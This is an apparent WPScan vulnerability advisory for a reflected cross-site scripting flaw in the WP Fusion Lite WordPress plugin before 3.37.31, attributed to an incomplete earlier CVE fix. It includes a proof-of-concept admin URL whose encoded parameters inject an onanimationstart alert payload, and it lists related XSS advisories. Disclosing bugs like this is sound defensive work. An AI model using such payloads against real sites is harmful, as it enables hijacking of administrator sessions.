WP Fusion Lite < 3.37.31 – Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The plugin does not escape the startdate and enddate parameters before outputting them back in an admin page, leading to a Reflected Cross-Site Scripting issue.

This is due to an incorrect fix of CVE-2021-34660 (https://wpscan.com/vulnerability/4a4934d6-282d-4e8c-922a-6b1f12884191)

Proof of Concept

https://example.com/wp-admin/tools.php?page=wpf-settings-logs&startdate=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-start%2F%29%2F%2F&enddate=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-end%2F%29%2F%2F

Affects Plugins

Fixed in 3.37.31

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

21ad97e8-a6e5-44c1-8a53-3c9a61f45f50

Timeline

Publicly Published

2021-08-09 (about 4 years ago)

Added

2021-08-09 (about 4 years ago)

Last Updated

2021-08-09 (about 4 years ago)

Other

Published

Title

Published

2025-12-31

Title

Tooltips <= 10.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-08-25

Title

WPAvatar <= 1.9.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-05-19

Title

Mega Menu Block < 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-12-05

Title

Smart External Link Click Monitor [Link Log] <= 5.0.2 - Reflected Cross-Site Scripting

Published

2022-12-02

Title

Chained Quiz < 1.3.2.4 - Multiple Reflected Cross-Site Scripting